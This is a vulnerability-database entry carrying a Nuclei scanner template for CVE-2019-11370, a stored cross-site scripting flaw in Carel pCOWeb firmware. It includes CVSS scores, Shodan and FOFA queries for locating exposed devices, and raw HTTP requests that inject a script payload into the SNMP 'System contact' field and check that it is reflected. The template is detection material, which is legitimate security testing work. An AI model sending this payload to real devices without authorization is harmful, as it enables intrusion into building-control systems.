Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-11370
HistoryJul 30, 2022 - 12:03 p.m.

Carel pCOWeb <B1.2.4 - Cross-Site Scripting

2022-07-3012:03:57
ProjectDiscovery
github.com
23
cve
cross-site scripting
carel
exploit-db

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.17

Percentile

96.1%

Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field.
id: CVE-2019-11370

info:
  name: Carel pCOWeb <B1.2.4 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field.
  impact: |
    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Apply the latest patch or upgrade to a version that addresses the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/46897
    - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11370
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2019-11370
    cwe-id: CWE-79
    epss-score: 0.17043
    epss-percentile: 0.96067
    cpe: cpe:2.3:o:carel:pcoweb_card_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: carel
    product: pcoweb_card_firmware
    shodan-query:
      - http.html:"pCOWeb"
      - http.html:"pcoweb"
    fofa-query: body="pcoweb"
  tags: cve,cve2019,pcoweb,xss,carel,edb

http:
  - raw:
      - |
        POST /config/pw_snmp_done.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
      - |
        GET /config/pw_snmp.html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "text/html")'
          - status_code_2 == 200
          - contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>')
        condition: and
# digest: 4a0a00473045022100e4627a99ceecac99db98b1e0914905af8f24b1c540869c2d50d94e33b0c496910220670232e191dd380a2ced69e8cbc66c3332dc83cad8ea2d58e0f7a39a06fbb005:922c64590222798bb761d5b6d8e72950

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.17

Percentile

96.1%

Related for NUCLEI:CVE-2019-11370